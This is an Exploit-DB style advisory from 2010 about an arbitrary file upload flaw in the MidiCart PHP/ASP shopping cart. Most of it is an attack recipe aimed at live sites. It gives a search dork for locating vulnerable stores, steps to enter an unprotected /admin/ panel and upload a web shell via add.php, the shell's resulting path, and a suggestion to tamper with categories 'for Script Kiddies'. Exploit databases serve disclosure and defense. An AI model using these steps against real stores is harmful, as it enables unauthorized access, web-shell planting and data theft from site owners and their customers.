MidiCart PHP/ASP - Arbitrary File Upload

EDB-ID:

12636

CVE:

N/A

Author:

DigitALL

Type:

webapps

Platform:

PHP

Published:

2010-05-17

# Exploit Title: MidiCart PHP,ASP Shell Upload Vulnerability

# Date: 17.05.2010

# Author: DigitALL

# Software Link:
http://download.cnet.com/MidiCart-PHP-Shopping-Cart/3000-2649_4-10064577.html

# Version: All Version

# Tested on: DigitALL Xp Version x1

# Code :

[dork] : inurl:"order_money.php" or inurl:"order_money.asp" or "MidiCart PHP
Database Management"

[exploit] : Go To /admin/ İf No Password(%80 No Password) Go To /add.php
Your Shell Upload.Shell Go To /images/shell.php

[other] : No Upload Shell Edited Categories Or Add Categories Hacked for
Script Kiddies :)

[thanks] : Efe KroNicKq NoFearx38 and All 1923Turk.com Members

[site] ://  www.1923turk.com // www.digitallsecurity.org //
digit4ll.blogspot.com // www.hacker-zone.org // www.kankardes.com //